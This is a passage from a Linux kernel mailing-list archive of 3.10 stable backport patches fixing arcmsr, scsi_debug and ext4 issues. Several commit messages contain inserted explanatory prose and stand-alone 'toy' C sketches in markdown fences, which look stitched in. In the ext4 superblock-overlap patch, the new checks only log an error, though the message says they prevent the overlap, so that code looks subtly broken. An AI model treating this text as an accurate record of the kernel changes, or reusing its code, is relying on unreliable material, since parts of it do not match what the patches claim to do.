 		user_len = pcmdmessagefld->cmdmessage.Length;
+		if (user_len > 1032) {
+			retvalue = ARCMSR_MESSAGE_FAIL;
+			kfree(ver_addr);
+			goto message_out;
+		}
 		memcpy(ptmpuserbuffer, pcmdmessagefld->messagedatabuffer, user_len);
 		wqbuf_lastindex = acb->wqbuf_lastindex;
 		wqbuf_firstindex = acb->wqbuf_firstindex;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 148/319] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (46 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 147/319] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 149/319] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware Willy Tarreau
                   ` (170 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ewan D. Milne, Martin K . Petersen, Willy Tarreau

From: "Ewan D. Milne" <emilne@redhat.com>

commit 4d2b496f19f3c2cfaca1e8fa0710688b5ff3811d upstream.

map_storep was not being vfree()'d in the module_exit call.

Signed-off-by: Ewan D. Milne <emilne@redhat.com>
Reviewed-by: Laurence Oberman <loberman@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/scsi_debug.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/scsi/scsi_debug.c b/drivers/scsi/scsi_debug.c
index 0a537a0..be86e7a 100644
--- a/drivers/scsi/scsi_debug.c
+++ b/drivers/scsi/scsi_debug.c
@@ -3504,6 +3504,7 @@ static void __exit scsi_debug_exit(void)
 	bus_unregister(&pseudo_lld_bus);
 	root_device_unregister(pseudo_primary);
 
+	vfree(map_storep);
 	if (dif_storep)
 		vfree(dif_storep);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 149/319] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (47 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 148/319] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 150/319] ext4: validate that metadata blocks do not overlap superblock Willy Tarreau
                   ` (169 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ching Huang, Martin K . Petersen, Willy Tarreau

From: Ching Huang <ching2048@areca.com.tw>

commit 2bf7dc8443e113844d078fd6541b7f4aa544f92f upstream.

The arcmsr driver failed to pass SYNCHRONIZE CACHE to controller
firmware. Depending on how drive caches are handled internally by
controller firmware this could potentially lead to data integrity
problems.

Ensure that cache flushes are passed to the controller.

[mkp: applied by hand and removed unused vars]

Signed-off-by: Ching Huang <ching2048@areca.com.tw>
Reported-by: Tomas Henzl <thenzl@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/arcmsr/arcmsr_hba.c | 9 ---------
 1 file changed, 9 deletions(-)

diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
index 66dda86..8d9477c 100644
--- a/drivers/scsi/arcmsr/arcmsr_hba.c
+++ b/drivers/scsi/arcmsr/arcmsr_hba.c
@@ -2069,18 +2069,9 @@ static int arcmsr_queue_command_lck(struct scsi_cmnd *cmd,
 	struct AdapterControlBlock *acb = (struct AdapterControlBlock *) host->hostdata;
 	struct CommandControlBlock *ccb;
 	int target = cmd->device->id;
-	int lun = cmd->device->lun;
-	uint8_t scsicmd = cmd->cmnd[0];
 	cmd->scsi_done = done;
 	cmd->host_scribble = NULL;
 	cmd->result = 0;
-	if ((scsicmd == SYNCHRONIZE_CACHE) ||(scsicmd == SEND_DIAGNOSTIC)){
-		if(acb->devstate[target][lun] == ARECA_RAID_GONE) {
-    			cmd->result = (DID_NO_CONNECT << 16);
-		}
-		cmd->scsi_done(cmd);
-		return 0;
-	}
 	if (target == 16) {
 		/* virtual device for iop message transfer */
 		arcmsr_handle_virtual_command(acb, cmd);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 150/319] ext4: validate that metadata blocks do not overlap superblock
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (48 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 149/319] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 151/319] ext4: avoid modifying checksum fields directly during checksum verification Willy Tarreau
                   ` (168 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Theodore Ts'o, Willy Tarreau

From: Theodore Ts'o <tytso@mit.edu>

commit 829fa70dddadf9dd041d62b82cd7cea63943899d upstream.

A number of fuzzing failures seem to be caused by allocation bitmaps
or other metadata blocks being pointed at the superblock.

This can cause kernel BUG or WARNings once the superblock is
overwritten, so validate the group descriptor blocks to make sure this
doesn't happen.
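
The check can be pictured with a small stand-alone sketch. The struct and
function names below are hypothetical and much simpler than the real
ext4 group descriptor; like the patch, the sketch only compares each
field against the superblock block number.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef uint64_t toy_fsblk_t;

/* Hypothetical, simplified group descriptor (not struct ext4_group_desc). */
struct toy_group_desc {
	toy_fsblk_t block_bitmap;
	toy_fsblk_t inode_bitmap;
	toy_fsblk_t inode_table;
};

/* Count how many metadata pointers in gd land on the superblock block. */
static int toy_overlaps_superblock(const struct toy_group_desc *gd,
				   toy_fsblk_t sb_block)
{
	int hits = 0;

	assert(gd != NULL);
	if (gd->block_bitmap == sb_block)
		hits++;
	if (gd->inode_bitmap == sb_block)
		hits++;
	if (gd->inode_table == sb_block)
		hits++;
	return hits;
}
```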

Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/super.c | 18 +++++++++++++++++-
 1 file changed, 17 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 15a8189..a6966c9 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -2002,6 +2002,7 @@ void ext4_group_desc_csum_set(struct super_block *sb, __u32 block_group,
 
 /* Called at mount-time, super-block is locked */
 static int ext4_check_descriptors(struct super_block *sb,
+				  ext4_fsblk_t sb_block,
 				  ext4_group_t *first_not_zeroed)
 {
 	struct ext4_sb_info *sbi = EXT4_SB(sb);
@@ -2032,6 +2033,11 @@ static int ext4_check_descriptors(struct super_block *sb,
 			grp = i;
 
 		block_bitmap = ext4_block_bitmap(sb, gdp);
+		if (block_bitmap == sb_block) {
+			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
+				 "Block bitmap for group %u overlaps "
+				 "superblock", i);
+		}
 		if (block_bitmap < first_block || block_bitmap > last_block) {
 			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
 			       "Block bitmap for group %u not in group "
@@ -2039,6 +2045,11 @@ static int ext4_check_descriptors(struct super_block *sb,
 			return 0;
 		}
 		inode_bitmap = ext4_inode_bitmap(sb, gdp);
+		if (inode_bitmap == sb_block) {
+			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
+				 "Inode bitmap for group %u overlaps "
+				 "superblock", i);
+		}
 		if (inode_bitmap < first_block || inode_bitmap > last_block) {
 			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
 			       "Inode bitmap for group %u not in group "
@@ -2046,6 +2057,11 @@ static int ext4_check_descriptors(struct super_block *sb,
 			return 0;
 		}
 		inode_table = ext4_inode_table(sb, gdp);
+		if (inode_table == sb_block) {
+			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
+				 "Inode table for group %u overlaps "
+				 "superblock", i);
+		}
 		if (inode_table < first_block ||
 		    inode_table + sbi->s_itb_per_group - 1 > last_block) {
 			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
@@ -3766,7 +3782,7 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
 			goto failed_mount2;
 		}
 	}
-	if (!ext4_check_descriptors(sb, &first_not_zeroed)) {
+	if (!ext4_check_descriptors(sb, logical_sb_block, &first_not_zeroed)) {
 		ext4_msg(sb, KERN_ERR, "group descriptors corrupted!");
 		goto failed_mount2;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 151/319] ext4: avoid modifying checksum fields directly during checksum verification
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (49 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 150/319] ext4: validate that metadata blocks do not overlap superblock Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 152/319] ext4: use __GFP_NOFAIL in ext4_free_blocks() Willy Tarreau
                   ` (167 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daeho Jeong, Youngjin Gil, Theodore Ts'o, Willy Tarreau

From: Daeho Jeong <daeho.jeong@samsung.com>

commit b47820edd1634dc1208f9212b7ecfb4230610a23 upstream.

We temporarily change the checksum fields in buffers of some types of
metadata to '0' in order to verify the checksum values. Doing this
without locking the buffer can damage the checksums of metadata that
is being committed or written back to storage.
In our test, several metadata blocks were found with damaged
checksum values during the recovery process. When we only verify the
checksum value, we have to avoid modifying the checksum fields directly.
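
The technique can be sketched outside the kernel as follows. Everything
here is an assumption made for illustration: toy_chksum() is a plain
bitwise CRC32C update standing in for ext4_chksum(), and struct toy_hdr
and TOY_SEED are invented. The sketch relies only on the checksum being
chainable, so hashing "prefix, zeroed dummy, suffix" gives the same
result as zeroing the field in place, without ever writing to the buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_SEED 0xFFFFFFFFu	/* arbitrary seed for the sketch */

/* Chainable bitwise CRC32C update; a stand-in for ext4_chksum(). */
static uint32_t toy_chksum(uint32_t crc, const void *buf, size_t len)
{
	const uint8_t *p = buf;

	while (len--) {
		crc ^= *p++;
		for (int k = 0; k < 8; k++)
			crc = (crc >> 1) ^ (0x82F63B78u & -(crc & 1u));
	}
	return crc;
}

/* Hypothetical on-disk record with an embedded checksum field. */
struct toy_hdr {
	uint32_t magic;
	uint32_t checksum;
	uint32_t payload[4];
};

/* Old approach: zero the field in place, hash, then restore it. */
static uint32_t toy_csum_modifying(struct toy_hdr *h)
{
	uint32_t saved = h->checksum;
	uint32_t csum;

	h->checksum = 0;	/* racy if the buffer is being written out */
	csum = toy_chksum(TOY_SEED, h, sizeof(*h));
	h->checksum = saved;
	return csum;
}

/* New approach: hash around the field and feed a zeroed dummy instead. */
static uint32_t toy_csum_readonly(const struct toy_hdr *h)
{
	uint32_t dummy = 0;
	size_t off = offsetof(struct toy_hdr, checksum);
	uint32_t csum;

	assert(off + sizeof(dummy) <= sizeof(*h));
	csum = toy_chksum(TOY_SEED, h, off);
	csum = toy_chksum(csum, &dummy, sizeof(dummy));
	off += sizeof(dummy);
	csum = toy_chksum(csum, (const uint8_t *)h + off, sizeof(*h) - off);
	return csum;
}
```

Because the read-only variant takes a const pointer, the compiler also
helps enforce that verification never touches the stored checksum.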

Signed-off-by: Daeho Jeong <daeho.jeong@samsung.com>
Signed-off-by: Youngjin Gil <youngjin.gil@samsung.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Darrick J. Wong <darrick.wong@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/inode.c | 38 ++++++++++++++++++++++----------------
 fs/ext4/namei.c |  9 ++++-----
 fs/ext4/super.c | 18 +++++++++---------
 fs/ext4/xattr.c | 13 +++++++------
 4 files changed, 42 insertions(+), 36 deletions(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index 221b582..046e0e1 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -53,25 +53,31 @@ static __u32 ext4_inode_csum(struct inode *inode, struct ext4_inode *raw,
 			      struct ext4_inode_info *ei)
 {
 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
-	__u16 csum_lo;
-	__u16 csum_hi = 0;
 	__u32 csum;
+	__u16 dummy_csum = 0;
+	int offset = offsetof(struct ext4_inode, i_checksum_lo);
+	unsigned int csum_size = sizeof(dummy_csum);
 
-	csum_lo = le16_to_cpu(raw->i_checksum_lo);
-	raw->i_checksum_lo = 0;
-	if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE &&
-	    EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi)) {
-		csum_hi = le16_to_cpu(raw->i_checksum_hi);
-		raw->i_checksum_hi = 0;
-	}
+	csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)raw, offset);
+	csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, csum_size);
+	offset += csum_size;
+	csum = ext4_chksum(sbi, csum, (__u8 *)raw + offset,
+			   EXT4_GOOD_OLD_INODE_SIZE - offset);
 
-	csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)raw,
-			   EXT4_INODE_SIZE(inode->i_sb));
-
-	raw->i_checksum_lo = cpu_to_le16(csum_lo);
-	if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE &&
-	    EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi))
-		raw->i_checksum_hi = cpu_to_le16(csum_hi);
+	if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE) {
+		offset = offsetof(struct ext4_inode, i_checksum_hi);
+		csum = ext4_chksum(sbi, csum, (__u8 *)raw +
+				   EXT4_GOOD_OLD_INODE_SIZE,
+				   offset - EXT4_GOOD_OLD_INODE_SIZE);
+		if (EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi)) {
+			csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum,
+					   csum_size);
+			offset += csum_size;
+			csum = ext4_chksum(sbi, csum, (__u8 *)raw + offset,
+					   EXT4_INODE_SIZE(inode->i_sb) -
+					   offset);
+		}
+	}
 
 	return csum;
 }
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index facf8590..407bcf7 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -417,15 +417,14 @@ static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry *dirent,
 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
 	struct ext4_inode_info *ei = EXT4_I(inode);
 	__u32 csum;
-	__le32 save_csum;
 	int size;
+	__u32 dummy_csum = 0;
+	int offset = offsetof(struct dx_tail, dt_checksum);
 
 	size = count_offset + (count * sizeof(struct dx_entry));
-	save_csum = t->dt_checksum;
-	t->dt_checksum = 0;
 	csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)dirent, size);
-	csum = ext4_chksum(sbi, csum, (__u8 *)t, sizeof(struct dx_tail));
-	t->dt_checksum = save_csum;
+	csum = ext4_chksum(sbi, csum, (__u8 *)t, offset);
+	csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, sizeof(dummy_csum));
 
 	return cpu_to_le32(csum);
 }
diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index a6966c9..6cf69fa 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -1936,23 +1936,25 @@ failed:
 static __le16 ext4_group_desc_csum(struct ext4_sb_info *sbi, __u32 block_group,
 				   struct ext4_group_desc *gdp)
 {
-	int offset;
+	int offset = offsetof(struct ext4_group_desc, bg_checksum);
 	__u16 crc = 0;
 	__le32 le_group = cpu_to_le32(block_group);
 
 	if ((sbi->s_es->s_feature_ro_compat &
 	     cpu_to_le32(EXT4_FEATURE_RO_COMPAT_METADATA_CSUM))) {
 		/* Use new metadata_csum algorithm */
-		__le16 save_csum;
 		__u32 csum32;
+		__u16 dummy_csum = 0;
 
-		save_csum = gdp->bg_checksum;
-		gdp->bg_checksum = 0;
 		csum32 = ext4_chksum(sbi, sbi->s_csum_seed, (__u8 *)&le_group,
 				     sizeof(le_group));
-		csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp,
-				     sbi->s_desc_size);
-		gdp->bg_checksum = save_csum;
+		csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp, offset);
+		csum32 = ext4_chksum(sbi, csum32, (__u8 *)&dummy_csum,
+				     sizeof(dummy_csum));
+		offset += sizeof(dummy_csum);
+		if (offset < sbi->s_desc_size)
+			csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp + offset,
+					     sbi->s_desc_size - offset);
 
 		crc = csum32 & 0xFFFF;
 		goto out;
@@ -1963,8 +1965,6 @@ static __le16 ext4_group_desc_csum(struct ext4_sb_info *sbi, __u32 block_group,
 	      cpu_to_le32(EXT4_FEATURE_RO_COMPAT_GDT_CSUM)))
 		return 0;
 
-	offset = offsetof(struct ext4_group_desc, bg_checksum);
-
 	crc = crc16(~0, sbi->s_es->s_uuid, sizeof(sbi->s_es->s_uuid));
 	crc = crc16(crc, (__u8 *)&le_group, sizeof(le_group));
 	crc = crc16(crc, (__u8 *)gdp, offset);
diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
index a20816e..92850ba 100644
--- a/fs/ext4/xattr.c
+++ b/fs/ext4/xattr.c
@@ -123,17 +123,18 @@ static __le32 ext4_xattr_block_csum(struct inode *inode,
 {
 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
 	__u32 csum;
-	__le32 save_csum;
 	__le64 dsk_block_nr = cpu_to_le64(block_nr);
+	__u32 dummy_csum = 0;
+	int offset = offsetof(struct ext4_xattr_header, h_checksum);
 
-	save_csum = hdr->h_checksum;
-	hdr->h_checksum = 0;
 	csum = ext4_chksum(sbi, sbi->s_csum_seed, (__u8 *)&dsk_block_nr,
 			   sizeof(dsk_block_nr));
-	csum = ext4_chksum(sbi, csum, (__u8 *)hdr,
-			   EXT4_BLOCK_SIZE(inode->i_sb));
+	csum = ext4_chksum(sbi, csum, (__u8 *)hdr, offset);
+	csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, sizeof(dummy_csum));
+	offset += sizeof(dummy_csum);
+	csum = ext4_chksum(sbi, csum, (__u8 *)hdr + offset,
+			   EXT4_BLOCK_SIZE(inode->i_sb) - offset);
 
-	hdr->h_checksum = save_csum;
 	return cpu_to_le32(csum);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 152/319] ext4: use __GFP_NOFAIL in ext4_free_blocks()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (50 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 151/319] ext4: avoid modifying checksum fields directly during checksum verification Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 153/319] ext4: reinforce check of i_dtime when clearing high fields of uid and gid Willy Tarreau
                   ` (166 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Konstantin Khlebnikov, Theodore Ts'o, Willy Tarreau

From: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>

commit adb7ef600cc9d9d15ecc934cc26af5c1379777df upstream.

This might be unexpected, but pages allocated for sbi->s_buddy_cache are
charged to the current memory cgroup. So a GFP_NOFS allocation could fail
if the current task has been killed by OOM or if the current memory
cgroup has no free memory left. The block allocator cannot handle such
failures here yet.
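
The shape of the change (a _gfp variant that takes the allocation flags,
plus a thin wrapper that keeps the old default) can be sketched in user
space. This is a toy model under stated assumptions: TOY_NOFS, TOY_NOFAIL,
toy_alloc() and toy_fail_budget are invented for the example, and the
retry loop only imitates the "never fail" idea; the real __GFP_NOFAIL
behaviour lives inside the kernel page allocator.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

#define TOY_NOFS	0x1u	/* stand-in for GFP_NOFS */
#define TOY_NOFAIL	0x2u	/* stand-in for __GFP_NOFAIL */

static int toy_fail_budget;	/* number of upcoming attempts that fail */

/* Toy allocator: with TOY_NOFAIL it retries instead of returning NULL. */
static void *toy_alloc(size_t n, unsigned int flags)
{
	for (;;) {
		if (toy_fail_budget > 0) {
			toy_fail_budget--;
			if (flags & TOY_NOFAIL)
				continue;	/* retry until it succeeds */
			return NULL;
		}
		return malloc(n);
	}
}

/* Variant that lets the caller choose the allocation flags. */
static int toy_load_buddy_gfp(void **out, unsigned int flags)
{
	assert(out != NULL);
	*out = toy_alloc(64, flags);
	return *out ? 0 : -1;
}

/* Existing callers keep the old behaviour through this wrapper. */
static int toy_load_buddy(void **out)
{
	return toy_load_buddy_gfp(out, TOY_NOFS);
}
```

Only the one caller that cannot handle failure passes the stricter flag,
so every other call site stays unchanged.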

Signed-off-by: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/mballoc.c | 47 ++++++++++++++++++++++++++++-------------------
 1 file changed, 28 insertions(+), 19 deletions(-)

diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
index 08b4495..cb9eec0 100644
--- a/fs/ext4/mballoc.c
+++ b/fs/ext4/mballoc.c
@@ -808,7 +808,7 @@ static void mb_regenerate_buddy(struct ext4_buddy *e4b)
  * for this page; do not hold this lock when calling this routine!
  */
 
-static int ext4_mb_init_cache(struct page *page, char *incore)
+static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
 {
 	ext4_group_t ngroups;
 	int blocksize;
@@ -841,7 +841,7 @@ static int ext4_mb_init_cache(struct page *page, char *incore)
 	/* allocate buffer_heads to read bitmaps */
 	if (groups_per_page > 1) {
 		i = sizeof(struct buffer_head *) * groups_per_page;
-		bh = kzalloc(i, GFP_NOFS);
+		bh = kzalloc(i, gfp);
 		if (bh == NULL) {
 			err = -ENOMEM;
 			goto out;
@@ -966,7 +966,7 @@ out:
  * are on the same page e4b->bd_buddy_page is NULL and return value is 0.
  */
 static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
-		ext4_group_t group, struct ext4_buddy *e4b)
+		ext4_group_t group, struct ext4_buddy *e4b, gfp_t gfp)
 {
 	struct inode *inode = EXT4_SB(sb)->s_buddy_cache;
 	int block, pnum, poff;
@@ -985,7 +985,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
 	block = group * 2;
 	pnum = block / blocks_per_page;
 	poff = block % blocks_per_page;
-	page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+	page = find_or_create_page(inode->i_mapping, pnum, gfp);
 	if (!page)
 		return -EIO;
 	BUG_ON(page->mapping != inode->i_mapping);
@@ -999,7 +999,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
 
 	block++;
 	pnum = block / blocks_per_page;
-	page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+	page = find_or_create_page(inode->i_mapping, pnum, gfp);
 	if (!page)
 		return -EIO;
 	BUG_ON(page->mapping != inode->i_mapping);
@@ -1025,7 +1025,7 @@ static void ext4_mb_put_buddy_page_lock(struct ext4_buddy *e4b)
  * calling this routine!
  */
 static noinline_for_stack
-int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
+int ext4_mb_init_group(struct super_block *sb, ext4_group_t group, gfp_t gfp)
 {
 
 	struct ext4_group_info *this_grp;
@@ -1043,7 +1043,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
 	 * have taken a reference using ext4_mb_load_buddy and that
 	 * would have pinned buddy page to page cache.
 	 */
-	ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b);
+	ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b, gfp);
 	if (ret || !EXT4_MB_GRP_NEED_INIT(this_grp)) {
 		/*
 		 * somebody initialized the group
@@ -1053,7 +1053,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
 	}
 
 	page = e4b.bd_bitmap_page;
-	ret = ext4_mb_init_cache(page, NULL);
+	ret = ext4_mb_init_cache(page, NULL, gfp);
 	if (ret)
 		goto err;
 	if (!PageUptodate(page)) {
@@ -1073,7 +1073,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
 	}
 	/* init buddy cache */
 	page = e4b.bd_buddy_page;
-	ret = ext4_mb_init_cache(page, e4b.bd_bitmap);
+	ret = ext4_mb_init_cache(page, e4b.bd_bitmap, gfp);
 	if (ret)
 		goto err;
 	if (!PageUptodate(page)) {
@@ -1092,8 +1092,8 @@ err:
  * calling this routine!
  */
 static noinline_for_stack int
-ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
-					struct ext4_buddy *e4b)
+ext4_mb_load_buddy_gfp(struct super_block *sb, ext4_group_t group,
+		       struct ext4_buddy *e4b, gfp_t gfp)
 {
 	int blocks_per_page;
 	int block;
@@ -1123,7 +1123,7 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
 		 * we need full data about the group
 		 * to make a good selection
 		 */
-		ret = ext4_mb_init_group(sb, group);
+		ret = ext4_mb_init_group(sb, group, gfp);
 		if (ret)
 			return ret;
 	}
@@ -1151,11 +1151,11 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
 			 * wait for it to initialize.
 			 */
 			page_cache_release(page);
-		page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+		page = find_or_create_page(inode->i_mapping, pnum, gfp);
 		if (page) {
 			BUG_ON(page->mapping != inode->i_mapping);
 			if (!PageUptodate(page)) {
-				ret = ext4_mb_init_cache(page, NULL);
+				ret = ext4_mb_init_cache(page, NULL, gfp);
 				if (ret) {
 					unlock_page(page);
 					goto err;
@@ -1182,11 +1182,12 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
 	if (page == NULL || !PageUptodate(page)) {
 		if (page)
 			page_cache_release(page);
-		page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+		page = find_or_create_page(inode->i_mapping, pnum, gfp);
 		if (page) {
 			BUG_ON(page->mapping != inode->i_mapping);
 			if (!PageUptodate(page)) {
-				ret = ext4_mb_init_cache(page, e4b->bd_bitmap);
+				ret = ext4_mb_init_cache(page, e4b->bd_bitmap,
+							 gfp);
 				if (ret) {
 					unlock_page(page);
 					goto err;
@@ -1220,6 +1221,12 @@ err:
 	return ret;
 }
 
+static int ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
+			      struct ext4_buddy *e4b)
+{
+	return ext4_mb_load_buddy_gfp(sb, group, e4b, GFP_NOFS);
+}
+
 static void ext4_mb_unload_buddy(struct ext4_buddy *e4b)
 {
 	if (e4b->bd_bitmap_page)
@@ -1993,7 +2000,7 @@ static int ext4_mb_good_group(struct ext4_allocation_context *ac,
 
 	/* We only do this if the grp has never been initialized */
 	if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
-		int ret = ext4_mb_init_group(ac->ac_sb, group);
+		int ret = ext4_mb_init_group(ac->ac_sb, group, GFP_NOFS);
 		if (ret)
 			return 0;
 	}
@@ -4748,7 +4755,9 @@ do_more:
 #endif
 	trace_ext4_mballoc_free(sb, inode, block_group, bit, count_clusters);
 
-	err = ext4_mb_load_buddy(sb, block_group, &e4b);
+	/* __GFP_NOFAIL: retry infinitely, ignore TIF_MEMDIE and memcg limit. */
+	err = ext4_mb_load_buddy_gfp(sb, block_group, &e4b,
+				     GFP_NOFS|__GFP_NOFAIL);
 	if (err)
 		goto error_return;
 
@@ -5159,7 +5168,7 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
 		grp = ext4_get_group_info(sb, group);
 		/* We only do this if the grp has never been initialized */
 		if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
-			ret = ext4_mb_init_group(sb, group);
+			ret = ext4_mb_init_group(sb, group, GFP_NOFS);
 			if (ret)
 				break;
 		}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 153/319] ext4: reinforce check of i_dtime when clearing high fields of uid and gid
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (51 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 152/319] ext4: use __GFP_NOFAIL in ext4_free_blocks() Willy Tarreau
